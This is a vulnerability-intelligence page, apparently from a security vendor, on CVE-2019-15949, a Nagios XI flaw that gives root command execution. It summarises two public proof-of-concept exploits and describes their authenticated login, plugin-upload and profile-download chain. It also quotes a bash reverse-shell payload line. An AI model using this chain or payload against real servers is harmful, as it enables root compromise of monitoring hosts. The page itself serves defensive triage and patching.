CVE-2019-15949 affects Nagios XI before 5.6.6 and allows command execution as root. The issue arises from the system profile download functionality (profile.php?cmd=download), which invokes getprofile.sh with root privileges through a passwordless sudo configuration. That script executes check_plugin, a file owned and modifiable by the nagios user. An attacker who already has access to the server as the nagios user, or who is authenticated to the Nagios XI web interface as an admin user with permission to modify plugins, can alter the check_plugin executable to include arbitrary commands. When the system profile is downloaded and getprofile.sh runs, those attacker-controlled commands execute as root.
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
2 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (1 hidden).
This repository is a small standalone Python proof-of-concept exploit for CVE-2019-15949 affecting Nagios XI <= 5.6.5. It contains only two files: a README describing the vulnerability and usage, and a single executable script, exploit.py, which is the main entry point. The exploit is not part of a larger framework. The script automates an authenticated web attack chain against Nagios XI. It first connects to /nagiosxi/login.php, parses the HTML to extract the NSP token, and logs in with supplied credentials. It then requests /nagiosxi/admin/monitoringplugins.php to obtain another NSP token and uploads a malicious plugin file named check_ping. The uploaded content is not a normal plugin binary or script wrapper; it is a raw bash reverse-shell command: bash -i >& /dev/tcp/<reverse_ip>/<reverse_port> 0>&1. Finally, the script triggers /nagiosxi/includes/components/profile/profile.php?cmd=download, which according to the README causes the privileged getprofile.sh workflow to execute the attacker-controlled plugin, yielding code execution as root. Primary capability: authenticated remote code execution leading to privilege escalation to root, provided the attacker already has a Nagios XI account with sufficient permissions to manage plugins (or equivalent access described in the README). The exploit is operational rather than a mere detection script because it performs login, token extraction, payload upload, and trigger steps end-to-end, and includes a working reverse-shell payload. It is not heavily weaponized: the payload is hardcoded to a bash reverse shell and requires the operator to supply callback IP/port and run a listener. Notable implementation details: the script supports both HTTP and HTTPS via a boolean argument, disables TLS certificate verification and urllib3 warnings, uses requests.Session() for cookie persistence, and relies on BeautifulSoup to scrape hidden nsp form fields. Error handling is minimal; it only checks for a non-200 login response and otherwise assumes the target pages and tokens are present. Overall, the repository’s purpose is to provide a concise authenticated RCE/root-shell PoC for vulnerable Nagios XI deployments.
This repository contains a Python proof-of-concept exploit for CVE-2019-15949, a remote code execution vulnerability in Nagios XI versions 5.6.5 and below. The exploit consists of two files: a README.md with detailed vulnerability and usage information, and exploit.py, which automates the attack. The exploit works by logging into the Nagios XI web interface with valid credentials, uploading a malicious plugin containing a bash reverse shell payload, and then triggering the payload by downloading a system profile. The attack results in a reverse shell as root on the target system. The code interacts with several Nagios XI web endpoints, including login, plugin management, and profile download. The exploit is operational and requires the attacker to have valid credentials with plugin management permissions.
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An authenticated command injection vulnerability in Nagios XI.
An authenticated command injection vulnerability in Nagios XI affecting versions prior to 5.6.6.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.